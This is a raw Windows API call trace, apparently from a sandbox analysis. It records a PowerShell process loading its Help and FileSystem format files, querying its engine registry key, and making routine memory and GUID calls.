	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x119, lpOverlapped=0x0) returned 1
	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0283.728] CloseHandle (hObject=0x1c4) returned 1
	[0283.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.729] SetErrorMode (uMode=0x1) returned 0x1
	[0283.729] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0283.729] SetErrorMode (uMode=0x1) returned 0x1
	[0283.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.729] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1c4) returned 0x0
	[0283.729] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0283.729] CoTaskMemAlloc (cb=0x5a) returned 0x4b1970
	[0283.729] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x4b1970, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0283.729] CoTaskMemFree (pv=0x4b1970) 
	[0283.729] RegCloseKey (hKey=0x1c4) returned 0x0
	[0283.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.731] VirtualQuery (in: lpAddress=0x20b820, lpBuffer=0x20c6e0, dwLength=0x30 | out: lpBuffer=0x20c6e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.731] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa67b314e, Data2=0xfe8, Data3=0x42c3, Data4=([0]=0x8f, [1]=0xef, [2]=0x88, [3]=0x59, [4]=0x63, [5]=0x3e, [6]=0xeb, [7]=0x7e))) returned 0x0
	[0283.731] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.731] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe03b386, Data2=0x1716, Data3=0x4bb0, Data4=([0]=0x8a, [1]=0x57, [2]=0x60, [3]=0x8a, [4]=0xba, [5]=0x97, [6]=0x67, [7]=0x19))) returned 0x0
	[0283.731] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x7cb502f4, Data2=0x3d67, Data3=0x4d20, Data4=([0]=0x96, [1]=0x9b, [2]=0xfc, [3]=0x74, [4]=0xb3, [5]=0x23, [6]=0x7, [7]=0x74))) returned 0x0
	[0283.731] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xbaa86d95, Data2=0x9fa8, Data3=0x4cce, Data4=([0]=0xb9, [1]=0xf2, [2]=0xe5, [3]=0x51, [4]=0xc1, [5]=0x35, [6]=0x39, [7]=0x10))) returned 0x0
	[0283.732] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.732] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.732] SetErrorMode (uMode=0x1) returned 0x1
	[0283.732] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0283.732] GetFileType (hFile=0x1c4) returned 0x1
	[0283.732] SetErrorMode (uMode=0x1) returned 0x1
	[0283.732] GetFileType (hFile=0x1c4) returned 0x1
	[0283.732] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.733] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.734] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.734] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.734] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.735] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.735] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.735] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.735] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.735] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.736] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.740] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.740] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.740] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.741] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.741] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.741] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.741] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.741] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.742] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.742] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.742] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.742] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.742] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.743] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.743] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.743] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.745] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.745] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.746] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.746] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.746] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.746] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.746] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.747] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.747] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.747] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.747] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.747] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.749] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.749] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.749] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.749] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.749] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.750] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.751] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.751] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.751] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0xf37, lpOverlapped=0x0) returned 1
	[0283.751] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbd107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd107*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0283.751] ReadFile (in: hFile=0x1c4, lpBuffer=0x2dbda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2dbda68*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0283.751] CloseHandle (hObject=0x1c4) returned 1
	[0283.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.752] SetErrorMode (uMode=0x1) returned 0x1
